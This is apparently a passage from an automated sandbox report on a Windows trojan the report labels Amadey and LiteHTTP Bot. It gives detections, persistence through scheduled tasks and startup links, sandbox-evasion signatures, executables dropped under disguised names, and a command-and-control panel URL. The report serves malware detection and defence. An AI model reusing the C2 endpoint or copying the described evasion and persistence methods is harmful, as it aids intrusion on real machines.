                    Source: Yara matchFile source: 00000009.00000002.4552061627.00000000082E2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DQmU06kq9I.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DQmU06kq9I.exe PID: 2000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DQmU06kq9I.exe PID: 2680, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected LiteHTTP Bot
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4541067680.0000000000552000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4541316207.0000000000552000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4552255837.0000000008742000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4552402541.0000000008C02000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2061776239.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4552122250.00000000087A2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.2654669900.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4552952321.0000000009062000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4552061627.00000000082E2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DQmU06kq9I.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DQmU06kq9I.exe PID: 2000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DQmU06kq9I.exe PID: 2680, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping841
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts22
                    Command and Scripting Interpreter                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Application Layer Protocol                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		2
                    Registry Run Keys / Startup Folder                    		371
                    Virtualization/Sandbox Evasion                    		Security Account Manager371
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		12
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials324
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576609 Sample: DQmU06kq9I.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Multi AV Scanner detection for dropped file 2->66 68 8 other signatures 2->68 7 DQmU06kq9I.exe 15 360 2->7         started        12 DQmU06kq9I.exe 450 2->12         started        14 DQmU06kq9I.exe 2 2->14         started        process3 dnsIp4 60 185.208.159.109, 49826, 49867, 49908 SIMPLECARRER2IT Switzerland 7->60 52 C:\Users\user\...\windowspowershell.exe, PE32 7->52 dropped 54 C:\Users\user\OneDrive\windows sidebar.exe, PE32 7->54 dropped 56 C:\Users\...\windows portable devices.exe, PE32 7->56 dropped 58 36 other malicious files 7->58 dropped 70 Detected unpacking (changes PE section rights) 7->70 72 Protects its processes via BreakOnTermination flag 7->72 74 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->74 84 5 other signatures 7->84 16 schtasks.exe 1 7->16         started        18 schtasks.exe 1 7->18         started        20 attrib.exe 7->20         started        30 9 other processes 7->30 76 Uses cmd line tools excessively to alter registry or file data 12->76 78 Hides threads from debuggers 12->78 80 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->80 22 schtasks.exe 12->22         started        24 attrib.exe 12->24         started        26 attrib.exe 12->26         started        32 4 other processes 12->32 82 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->82 28 schtasks.exe 14->28         started        file5 signatures6 process7 process8 34 conhost.exe 16->34         started        36 conhost.exe 18->36         started        38 conhost.exe 20->38         started        40 conhost.exe 22->40         started        42 conhost.exe 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 8 other processes 30->48 50 4 other processes 32->50

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DQmU06kq9I.exe61%ReversingLabsWin32.Trojan.Amadey
                    DQmU06kq9I.exe35%VirustotalBrowse
                    DQmU06kq9I.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\OneDrive\msbuild.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\mozilla maintenance service.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\jdownloader.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\msecache.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\google.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\windows mail.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\common files.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\java.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\windows defender.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\microsoft.net.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\microsoft.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\reference assemblies.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\microsoft office.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\internet explorer.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\autoit3.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\autoit3.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\common files.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\google.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\internet explorer.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\java.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\jdownloader.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\microsoft office.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\microsoft.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\microsoft.net.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\mozilla maintenance service.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\msbuild.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\msecache.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\reference assemblies.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows defender.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows mail.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows media player.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows multimedia platform.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows nt.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows photo viewer.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows portable devices.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windows sidebar.exe61%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\OneDrive\windowspowershell.exe61%ReversingLabsWin32.Trojan.Amadey

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.208.159.109/panel/page.php0%Avira URL Cloudsafe
                    http://185.208.159.109/panel/page.phpP0%Avira URL Cloudsafe
                    http://185.208.159.109/panel/page.php90%Avira URL Cloudsafe
                    http://185.208.159.1090%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    fp2e7a.wpc.phicdn.net
                    		192.229.221.95
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.208.159.109/panel/page.phptrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.208.159.109/panel/page.phpPDQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.208.159.109/panel/page.php9DQmU06kq9I.exe, 00000009.00000002.4542857867.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010F7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://185.208.159.109DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000526E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005026000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.208.159.109
                        		unknownSwitzerland
                        		34888SIMPLECARRER2ITtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1576609
                        Start date and time:2024-12-17 10:18:18 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 12m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:45
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Sample name:DQmU06kq9I.exe
                        renamed because original name is a hash value
                        Original Sample Name:d37dab4c59e707f632bb0b91eaa87ff9.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.mine.winEXE@53/47@0/1
                        EGA Information:
                        • Successful, ratio: 33.3%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                        • Excluded domains from analysis (whitelisted): crl.edge.digicert.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, crl3.digicert.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target DQmU06kq9I.exe, PID 2000 because it is empty
                        • Execution Graph export aborted for target DQmU06kq9I.exe, PID 2680 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:19:10API Interceptor7273251x Sleep call for process: DQmU06kq9I.exe modified
                        10:20:07Task SchedulerRun new task: DQmU06kq9I path: C:\Users\user\Desktop\DQmU06kq9I.exe
                        10:20:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnk

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.208.159.109file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                        • 185.208.159.109/panel/page.php

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        fp2e7a.wpc.phicdn.net3fX4NR35LH.exeGet hashmaliciousCryptbotBrowse
                        • 192.229.221.95
                        a8o2z9Awf6.exeGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        BKT2HSG6sZ.exeGet hashmaliciousRedLineBrowse
                        • 192.229.221.95
                        PO#11111002222.vbsGet hashmaliciousFormBookBrowse
                        • 192.229.221.95
                        Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        Client-built.exeGet hashmaliciousQuasarBrowse
                        • 192.229.221.95
                        nj.exeGet hashmaliciousQuasarBrowse
                        • 192.229.221.95
                        gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 192.229.221.95
                        wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                        • 192.229.221.95
                        09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                        • 192.229.221.95

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        SIMPLECARRER2ITfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                        • 185.208.159.109
                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                        • 185.196.8.237
                        file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                        • 185.208.158.187
                        Ziraat Bankasi Swift Mesaji.dqy.dllGet hashmaliciousAsyncRAT, VenomRATBrowse
                        • 185.208.158.187
                        file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                        • 185.208.158.187
                        file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                        • 185.208.158.187
                        lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                        • 185.196.8.68
                        file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                        • 185.196.8.239
                        stail.exeGet hashmaliciousSocks5SystemzBrowse
                        • 185.208.158.202
                        getlab.exeGet hashmaliciousSocks5SystemzBrowse
                        • 185.208.158.202

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\OneDrive\common files.exefile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                            file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                C:\Users\user\OneDrive\autoit3.exefile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                    file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnk

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                        Category:dropped
                                        Size (bytes):489
                                        Entropy (8bit):4.1890631882140195
                                        Encrypted:false
                                        SSDEEP:12:8mcM1qzYNbRuVC/p4+TG7jEjA2dNIRcqqTGIFi:8mlTnuk4+y7UA2DIR2yB
                                        MD5:A9F0FC9E0646B0C627AECFF550F859DE
                                        SHA1:6D53BAC72201CA4161E8A4E5AE87F50C5A12349E
                                        SHA-256:120130EFFFB439A0E9F1BAC3C333565DCB06927E53658D30A7D4003E7EAC0670
                                        SHA-512:277ED187D5232C983D14E6EE3EB5C3A3942D2A25772956E0A690500EEC7F91965B66733C249E6DDF9F3F16ACABBC1E388EC8967EF3F496A16104E95AB51F9FC1
                                        Malicious:false
                                        Preview:L..................F.............................................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........m.....V.dP....j.2......YdJ .DQMU06~1.EXE..N......DW.r.YdJ..........................-j..D.Q.m.U.0.6.k.q.9.I...e.x.e.......U...............-.......T...........*.a/.....C:\Users\user\Desktop\DQmU06kq9I.exe..+.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.Q.m.U.0.6.k.q.9.I...e.x.e...C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.....

                                        C:\Users\user\OneDrive\autoit3.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\autoit3.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\common files.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\common files.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\google.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

